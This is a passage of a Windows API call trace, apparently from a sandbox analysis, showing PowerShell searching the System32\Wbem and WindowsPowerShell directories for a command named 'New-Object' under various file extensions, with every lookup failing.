	[0046.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.548] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0046.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.EXE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\New-Object.EXE", lpFilePart=0x0) returned 0x27
	[0046.548] GetFullPathNameW (in: lpFileName="New-Object.EXE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.EXE", lpFilePart=0x0) returned 0x28
	[0046.548] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.EXE", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.548] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0046.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.BAT", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\New-Object.BAT", lpFilePart=0x0) returned 0x27
	[0046.548] GetFullPathNameW (in: lpFileName="New-Object.BAT", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.BAT", lpFilePart=0x0) returned 0x28
	[0046.548] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.BAT", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.549] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0046.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.CMD", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\New-Object.CMD", lpFilePart=0x0) returned 0x27
	[0046.549] GetFullPathNameW (in: lpFileName="New-Object.CMD", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.CMD", lpFilePart=0x0) returned 0x28
	[0046.549] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.CMD", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.549] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0046.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.VBS", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\New-Object.VBS", lpFilePart=0x0) returned 0x27
	[0046.550] GetFullPathNameW (in: lpFileName="New-Object.VBS", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.VBS", lpFilePart=0x0) returned 0x28
	[0046.550] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.VBS", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.550] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0046.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.VBE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\New-Object.VBE", lpFilePart=0x0) returned 0x27
	[0046.550] GetFullPathNameW (in: lpFileName="New-Object.VBE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.VBE", lpFilePart=0x0) returned 0x28
	[0046.551] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.VBE", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.551] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0046.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.JS", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\New-Object.JS", lpFilePart=0x0) returned 0x26
	[0046.551] GetFullPathNameW (in: lpFileName="New-Object.JS", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.JS", lpFilePart=0x0) returned 0x27
	[0046.551] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.JS", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.552] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0046.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.JSE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\New-Object.JSE", lpFilePart=0x0) returned 0x27
	[0046.552] GetFullPathNameW (in: lpFileName="New-Object.JSE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.JSE", lpFilePart=0x0) returned 0x28
	[0046.552] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.JSE", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.552] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0046.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.WSF", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\New-Object.WSF", lpFilePart=0x0) returned 0x27
	[0046.552] GetFullPathNameW (in: lpFileName="New-Object.WSF", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.WSF", lpFilePart=0x0) returned 0x28
	[0046.552] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.WSF", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.553] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0046.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.WSH", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\New-Object.WSH", lpFilePart=0x0) returned 0x27
	[0046.553] GetFullPathNameW (in: lpFileName="New-Object.WSH", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.WSH", lpFilePart=0x0) returned 0x28
	[0046.553] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.WSH", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.554] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0046.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.MSC", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\New-Object.MSC", lpFilePart=0x0) returned 0x27
	[0046.554] GetFullPathNameW (in: lpFileName="New-Object.MSC", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.MSC", lpFilePart=0x0) returned 0x28
	[0046.554] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.MSC", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.554] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0046.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.CPL", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\New-Object.CPL", lpFilePart=0x0) returned 0x27
	[0046.555] GetFullPathNameW (in: lpFileName="New-Object.CPL", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.CPL", lpFilePart=0x0) returned 0x28
	[0046.555] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.CPL", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.555] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0046.555] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.556] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0046.556] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.ps1", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.556] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0046.557] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.psm1", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.557] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0046.557] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.psd1", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.557] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0046.558] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.COM", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.559] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0046.559] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.EXE", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.559] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0046.559] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.BAT", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.560] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0046.560] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.CMD", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.562] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.VBS", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.563] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.VBE", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.563] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.JS", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.563] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.JSE", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
